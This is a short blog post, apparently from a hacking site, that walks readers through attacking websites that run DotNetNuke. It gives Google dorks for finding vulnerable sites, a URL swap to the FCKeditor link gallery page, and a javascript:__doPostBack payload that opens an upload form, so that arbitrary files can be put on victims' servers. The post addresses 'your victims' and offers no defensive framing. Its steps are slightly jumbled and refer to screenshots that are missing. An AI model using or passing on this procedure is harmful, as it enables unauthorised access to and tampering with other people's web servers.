Today I have founded a new way of web hacking known as DNN - DOTNetNukewhich allows us to upload any thing to the web server of your victims domain etc.. Actually DotNetNuke is an open source web content management system based on Microsoft .NET technology. Please perform this attack in Google chrome, Mozilla Firefox or Opera only. Below is the procedure to perform it by simply using Google search engine.Procedure
1. Open www.google.com2. then search this dork to find vulnerable sites using Google or you can also find it yourself by doing other methods also…
3. Now you will find many websites in the Google search as given below-:inurl:/tabid/36/language/en-US/Default.aspx
4. Choice one of the sites above and open it in the browser.
5. For ex- you choose- http://www.xyz.com/Home/tabid/36/Language/en-US/Default.aspx where xyz is domain name
6. Now replace- /Home/tabid/36/Language/en-US/Default.aspx
with this /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. and hit enter…
8. Hence, you will see this screen in the browser-
8. Choose the 3rd option above and then at the address bar, type this JavaScript below-
9. Done! Now you have the upload option coming at the site like this-javascript:__doPostBack('ctlURL$cmdUpload','')
10. Now you can upload any type of file you want as for ex- txt, swf, jpg, gif, pdf Files etc..
11. After uploading files, your file is save in root folder and your address will be such ashttp://www.xyz.com/portals/0/krackoworld.txt and have full access.
12. Chapter closed here…
Tip - You can also use Google dork such as inurl:"/portals/0" to find more vulnerable sites above.
No comments:
Post a Comment